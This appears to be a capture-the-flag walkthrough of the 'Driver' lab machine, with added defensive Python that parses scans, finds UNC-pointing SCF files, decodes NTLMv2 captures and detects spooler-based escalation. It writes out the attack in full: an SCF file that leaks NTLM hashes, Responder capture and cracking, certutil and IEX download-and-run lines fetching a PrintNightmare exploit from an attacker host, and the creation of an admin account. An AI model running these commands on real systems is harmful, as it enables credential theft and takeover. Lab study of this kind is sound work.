Driver

$ nmap -p- -T4 -A 10.10.11.106
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-15 16:55 EDT
Nmap scan report for 10.10.11.106
Host is up (0.026s latency).
Not shown: 65531 filtered ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m55s, deviation: 0s, median: 6h59m55s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-10-16T03:58:12
|_  start_date: 2021-10-15T16:27:47

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.33 seconds
5985 WinRM; 445 SMB; 139 NetBIOS
$ nmap -sC -sV -oN nmap 10.10.11.106 10.10.11.106
-sC: equivalent to --script=default
-oN filespec (normal output)
-sV: Probe open ports to determine service/version info
Null scan (-sN): sets no TCP flag bits (the flag header is 0)
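Added example (mine, not part of the original notes): a small Python audit that reads nmap -oN output and flags the two weaknesses this scan exposes, HTTP Basic authentication offered on a non-TLS port and SMB signing that is enabled but not required. SAMPLE_SCAN and HARDENED_SCAN are constructed excerpts modelled on the scan above; the finding wording is my own.

```python
import re

# Constructed excerpt of nmap -oN output, modelled on the scan above (trimmed to the relevant lines).
SAMPLE_SCAN = """
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth:
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# Constructed: what the same host would report with TLS in front of IIS and SMB signing enforced.
HARDENED_SCAN = """
PORT     STATE SERVICE      VERSION
443/tcp  open  ssl/http     Microsoft IIS httpd 10.0
| http-auth:
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

Host script results:
| smb2-security-mode:
|   3.11:
|_    Message signing enabled and required
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")

def audit_nmap(text):
    """Return findings as dicts {port, severity, issue} from nmap normal-output text."""
    findings, services, current = [], {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            services[current] = m.group(3)
            continue
        if line.startswith("Host script results"):
            current = None          # host scripts (smb*-security-mode) follow; port context ends here
            continue
        body = line.lstrip("|_ ").strip()   # drop nmap's script-output gutter
        if current is not None and body.startswith("Basic realm=") \
                and not services[current].startswith("ssl"):
            findings.append({"port": current, "severity": "high",
                             "issue": "HTTP Basic auth without TLS: the admin password crosses the wire base64-encoded"})
        elif current is not None and body.startswith("Potentially risky methods:") and "TRACE" in body:
            findings.append({"port": current, "severity": "low", "issue": "TRACE method enabled"})
        elif current is None and body.startswith("message_signing: disabled"):
            findings.append({"port": 445, "severity": "high", "issue": "SMB1 message signing disabled"})
        elif current is None and body == "Message signing enabled but not required":
            findings.append({"port": 445, "severity": "high",
                             "issue": "SMB2 signing not required (NTLM relay to this host is not prevented)"})
    return findings

def worst_severity(findings):
    """Collapse a finding list to its highest severity ("none" when the list is empty)."""
    order = {"low": 0, "medium": 1, "high": 2}
    return max((f["severity"] for f in findings), key=order.get, default="none")

if __name__ == "__main__":
    for f in audit_nmap(SAMPLE_SCAN):
        print(f"{f['port']:>5}  {f['severity']:<5}  {f['issue']}")
```

Run it against a real -oN file with `audit_nmap(open("nmap").read())`; the two SMB findings come from the host-script section, which is why the parser clears the port context at "Host script results".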
SCF File Attacks; SMB Exploit via NTLM Capture
upload firmware.scf:
[Shell]
Command=2
IconFile=\\10.10.14.207\share\test.ico
[Taskbar]
Command=ToggleDesktop
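Added example, not from the original notes: a scanner a defender can run over an upload directory or an exported share to find SCF files whose IconFile points at a remote UNC host, which is what makes Explorer authenticate to that host the moment the folder is rendered. It generalises beyond the page: .url files (IconFile/URL) and desktop.ini (IconResource) resolve icon paths the same way, so they are checked too. SAMPLE_SCF reproduces the firmware.scf above; BENIGN_SCF is constructed; allowed_hosts is an assumed allow-list of legitimate file servers.

```python
import os
import re

# Keys whose value Explorer resolves (and, for a UNC path, authenticates to) as soon as the
# containing folder is rendered. .scf is the case above; .url and desktop.ini behave the same way.
ICON_KEYS = {".scf": {"iconfile"}, ".url": {"iconfile", "url"}, ".ini": {"iconresource"}}
# Matches \\host\..., //host/... and file://host/... and captures the host part.
REMOTE_RE = re.compile(r"^\s*(?:\\\\|//|file:/+)([^\\/\s]+)", re.IGNORECASE)

# The firmware.scf from the notes above, reproduced as test input.
SAMPLE_SCF = "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.14.207\\share\\test.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
# Constructed benign SCF: icon taken from a local binary, no network access involved.
BENIGN_SCF = "[Shell]\r\nCommand=2\r\nIconFile=C:\\Windows\\System32\\imageres.dll,109\r\n"

def parse_ini(text):
    """Minimal case-insensitive INI parser: {section: {key: value}}; tolerant of BOM and CRLF."""
    data, section = {}, ""
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line[0] in ";#":
            continue
        if line[0] == "[" and line[-1] == "]":
            section = line[1:-1].strip().lower()
            data.setdefault(section, {})
        elif "=" in line:
            key, _, value = line.partition("=")
            data.setdefault(section, {})[key.strip().lower()] = value.strip()
    return data

def scan_text(filename, text, allowed_hosts=()):
    """Return findings for one file's contents: every icon/URL key that points at a remote host
    not on the allow-list (allowed_hosts is an assumed list of legitimate file servers)."""
    base = os.path.basename(filename).lower()
    ext = os.path.splitext(base)[1]
    if ext == ".ini" and base != "desktop.ini":   # only desktop.ini is auto-processed by Explorer
        return []
    keys = ICON_KEYS.get(ext)
    if keys is None:
        return []
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for section, items in parse_ini(text).items():
        for key, value in items.items():
            m = REMOTE_RE.match(value) if key in keys else None
            if m and m.group(1).lower() not in allowed:
                findings.append({"file": filename, "section": section, "key": key,
                                 "host": m.group(1), "value": value})
    return findings

def scan_directory(root, allowed_hosts=()):
    """Walk an upload directory or share export and scan every candidate file."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if os.path.splitext(name.lower())[1] in ICON_KEYS:
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(path, fh.read(), allowed_hosts))
    return findings

if __name__ == "__main__":
    for f in scan_text("firmware.scf", SAMPLE_SCF):
        print(f"{f['file']}: [{f['section']}] {f['key']} -> remote host {f['host']}")
```

Point `scan_directory` at the web root that accepts the firmware upload; anything it returns with a host outside the allow-list is a file that will make every user who browses that folder send an NTLM authentication to an external machine.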
sudo responder -wrf --lm -v -I tun0
$ sudo responder -A -I tun0

[+] Listening for events...                                                                                                                      

[SMB] NTLMv2-SSP Client   : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:aaebafc4be3c49f[hash truncated]
$ john -w:/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
liltony          (tony)
1g 0:00:00:00 DONE (2021-10-15 20:52) 9.090g/s 297890p/s 297890c/s 297890C/s !!!!!!..eatme1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt 
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E3-1575M v5 @ 3.00GHz, 13889/13953 MB (4096 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

TONY::DRIVER:aaebafc4be3c49f8:7876df0bdd05adc3cb433feb451de1ac:[blob truncated]:liltony
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: TONY::DRIVER:aaebafc4be3c49f8:7876df0bdd05adc3cb433...000000
Time.Started.....: Fri Oct 15 20:50:40 2021 (0 secs)
Time.Estimated...: Fri Oct 15 20:50:40 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   408.7 kH/s (2.66ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 32768/14344385 (0.23%)
Rejected.........: 0/32768 (0.00%)
Restore.Point....: 28672/14344385 (0.20%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: softball27 -> eatme1

Started: Fri Oct 15 20:50:28 2021
Stopped: Fri Oct 15 20:50:41 2021
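Added example (mine, not from the notes): a parser for the netntlmv2 line that Responder prints and that john/hashcat consume above. The last field is the NTLMv2 client challenge ("blob") which the client HMAC-MD5s with its NT hash, which is why a captured response can be attacked offline with a wordlist; decoding the blob exposes the client's clock and the target names it believed it was authenticating to, useful when correlating a capture with the host's Security 4624/4625 events and for explaining the roughly seven-hour clock skew nmap reported. The hash on the page is truncated, so SAMPLE_LINE is constructed with fake challenge and proof values and a blob encoded to the MS-NLMP layout.

```python
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# AV_PAIR ids from the NTLMv2 client challenge (MS-NLMP 2.2.2.1); only these are decoded here.
AV_NAMES = {0x0001: "nb_computer", 0x0002: "nb_domain",
            0x0003: "dns_computer", 0x0004: "dns_domain"}
AV_TIMESTAMP, AV_EOL = 0x0007, 0x0000

def filetime_to_dt(ft):
    # FILETIME counts 100 ns intervals since 1601-01-01 UTC
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)

def dt_to_filetime(dt):
    td = dt - FILETIME_EPOCH   # integer arithmetic: the value is too large for an exact float
    return (td.days * 86400 * 10**6 + td.seconds * 10**6 + td.microseconds) * 10

def parse_blob(blob):
    """Decode the NTLMv2_CLIENT_CHALLENGE ("blob") that the client signs with HMAC-MD5."""
    if len(blob) < 28 or blob[0] != 0x01 or blob[1] != 0x01:
        raise ValueError("not an NTLMv2 client challenge")
    ts, client_challenge = struct.unpack_from("<Q8s", blob, 8)   # after 8 bytes of type/reserved
    pairs, off = {}, 28                                            # 4 reserved bytes precede AV pairs
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == AV_EOL:
            break
        value = blob[off:off + av_len]
        off += av_len
        if av_id in AV_NAMES:
            pairs[AV_NAMES[av_id]] = value.decode("utf-16-le")
        elif av_id == AV_TIMESTAMP:
            pairs["av_timestamp"] = filetime_to_dt(struct.unpack("<Q", value)[0])
    return {"timestamp": filetime_to_dt(ts), "client_challenge": client_challenge.hex(),
            "av_pairs": pairs}

def parse_capture_line(line):
    """Split a Responder/john 'netntlmv2' line: user::domain:server_challenge:nt_proof:blob."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":", 5)
    if len(server_challenge) != 16 or len(nt_proof) != 32:
        raise ValueError("unexpected challenge/proof length")
    info = parse_blob(bytes.fromhex(blob_hex))
    info.update(user=user, domain=domain, server_challenge=server_challenge, nt_proof=nt_proof)
    return info

def clock_skew_seconds(info, observed_iso):
    """Victim clock (from the blob) minus the time the capture was observed, in seconds."""
    observed = datetime.fromisoformat(observed_iso)
    return int((info["timestamp"] - observed).total_seconds())

def build_sample_line(when, user="tony", domain="DRIVER"):
    """Constructed sample capture (fake challenge and proof) shaped like the Responder output above."""
    ft = dt_to_filetime(when)
    av = b""
    for av_id, text in ((0x0002, domain), (0x0001, domain),
                        (0x0004, domain.lower()), (0x0003, domain.lower())):
        v = text.encode("utf-16-le")
        av += struct.pack("<HH", av_id, len(v)) + v
    av += struct.pack("<HHQ", AV_TIMESTAMP, 8, ft) + struct.pack("<HH", AV_EOL, 0)
    blob = b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", ft) + bytes(range(8)) + b"\x00" * 4 + av
    return f"{user}::{domain}:{'11' * 8}:{'22' * 16}:{blob.hex()}"

# Constructed: the victim's clock matches the smb2-time value nmap reported for this host.
SAMPLE_LINE = build_sample_line(datetime(2021, 10, 16, 3, 58, 12, tzinfo=timezone.utc))

if __name__ == "__main__":
    info = parse_capture_line(SAMPLE_LINE)
    print(info["user"], info["domain"], info["timestamp"].isoformat(), info["av_pairs"])
```

Feed a real Responder line to `parse_capture_line` and compare `info["timestamp"]` with the sensor's own clock: a large, constant offset like the one nmap measured here is the client's clock, not a replay, and the AV-pair names tell you which server name the client thought it was talking to.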
$ evil-winrm -i 10.10.11.106 -u 'tony' -p 'liltony'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> 
*Evil-WinRM* PS C:\Users\tony\Desktop> type user.txt
b6919f936457f4e921d8842904774bc0
*Evil-WinRM* PS C:\Users\tony\Documents> ps
    385      22     5224      14436 ...13            1168 spoolsv

$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

certutil.exe -f -split -urlcache http://10.10.14.207:8000/winpeas.exe
https://github.com/calebstewart/CVE-2021-1675
certutil.exe -f -split -urlcache http://10.10.14.207:8000/printnightmare.ps1 printnightmare.ps1

*Evil-WinRM* PS C:\Users\tony\Downloads> import-module .\printnightmare.ps1
File C:\Users\tony\Downloads\printnightmare.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ import-module .\printnightmare.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
*Evil-WinRM* PS C:\Users\tony\Downloads> 

IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.207:8000/CVE-2021-1675.ps1')

Invoke-Nightmare -NewUser "NotExistingUser" -NewPassword "p@ssword1"

*Evil-WinRM* PS C:\Users\tony\Downloads> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
dedsec
NotExistingUser
The command completed successfully.

*Evil-WinRM* PS C:\Users\tony\Downloads> 
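Added example (not from the notes) of detection logic for the escalation path above, run over constructed event records: spooler driver activity (PrintService/Operational 316, which requires that log to be enabled since it is off by default, or PrintService/Admin 808, the spooler failing to load a plug-in module) followed within minutes by a local account creation (Security 4720) and an addition to Administrators (Security 4732) performed in SYSTEM or machine-account context rather than by a logged-on administrator. SAMPLE_EVENTS are constructed dicts standing in for parsed records; the field names are this example's own, not the Windows event XML schema.

```python
from datetime import datetime, timedelta

SECURITY = "Security"
PRINT_OPERATIONAL = "Microsoft-Windows-PrintService/Operational"   # must be enabled; off by default
PRINT_ADMIN = "Microsoft-Windows-PrintService/Admin"

# Constructed sample records (field names are this example's own, not the Windows XML schema),
# modelled on the trail the steps above would leave: spooler driver activity, then a local account
# created and added to Administrators by the machine account DRIVER$ (i.e. SYSTEM), not by a person.
SAMPLE_EVENTS = [
    {"time": "2021-10-16T01:10:00", "channel": SECURITY, "id": 4720,
     "subject": "Administrator", "target": "svc_backup"},                       # benign admin action
    {"time": "2021-10-16T07:03:10", "channel": PRINT_ADMIN, "id": 808,
     "message": "The print spooler failed to load a plug-in module (constructed)"},
    {"time": "2021-10-16T07:03:12", "channel": PRINT_OPERATIONAL, "id": 316,
     "message": "Printer driver was added or updated (constructed)"},
    {"time": "2021-10-16T07:03:15", "channel": SECURITY, "id": 4720,
     "subject": "DRIVER$", "target": "NotExistingUser"},
    {"time": "2021-10-16T07:03:16", "channel": SECURITY, "id": 4732,
     "subject": "DRIVER$", "target": "NotExistingUser", "group": "Administrators"},
]

def is_system_context(subject):
    """Work the spooler does runs as SYSTEM, which Security events attribute to SYSTEM or HOST$."""
    return subject is not None and (subject.upper() == "SYSTEM" or subject.endswith("$"))

def detect(events, window=timedelta(minutes=10)):
    """Flag account-creation / admin-group changes made in SYSTEM context; raise the severity
    when spooler driver activity happened within `window` before them."""
    events = sorted(events, key=lambda e: e["time"])
    spooler = [e for e in events
               if (e["channel"], e["id"]) in ((PRINT_OPERATIONAL, 316), (PRINT_ADMIN, 808))]
    alerts = []
    for e in events:
        if e["channel"] != SECURITY or e["id"] not in (4720, 4732):
            continue
        if e["id"] == 4732 and e.get("group", "").lower() != "administrators":
            continue
        if not is_system_context(e.get("subject")):
            continue
        t = datetime.fromisoformat(e["time"])
        recent = [s for s in spooler
                  if timedelta(0) <= t - datetime.fromisoformat(s["time"]) <= window]
        alerts.append({
            "severity": "high" if recent else "medium",
            "rule": "SYSTEM-context account change" + (" after spooler driver activity" if recent else ""),
            "time": e["time"], "event_id": e["id"], "subject": e["subject"], "target": e["target"],
            "preceded_by": [s["id"] for s in recent],
        })
    return alerts

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['time']} {a['rule']}: {a['subject']} -> {a['target']} "
              f"(event {a['event_id']}, preceded by {a['preceded_by']})")
```

The medium-severity branch is deliberate: a local account created or promoted by SYSTEM is unusual on its own and worth a ticket even when the PrintService log was never enabled, while the 316/808 correlation is what ties it to a spooler driver load.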

-ExecutionPolicy Bypass (workaround for the execution-policy error above)


kali@kali:~/0.htb/machines/Driver10.10.11.106$ evil-winrm -i 10.10.11.106 -u 'NotExistingUser' -p 'p@ssword1'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\NotExistingUser\Documents> cd ..\..\administrator\Desktop
*Evil-WinRM* PS C:\Users\administrator\Desktop> dir


    Directory: C:\Users\administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       10/16/2021   7:05 AM             34 root.txt


*Evil-WinRM* PS C:\Users\administrator\Desktop> cat root.txt
61b8662606ad94338c195222abdc99e7
*Evil-WinRM* PS C:\Users\administrator\Desktop> 
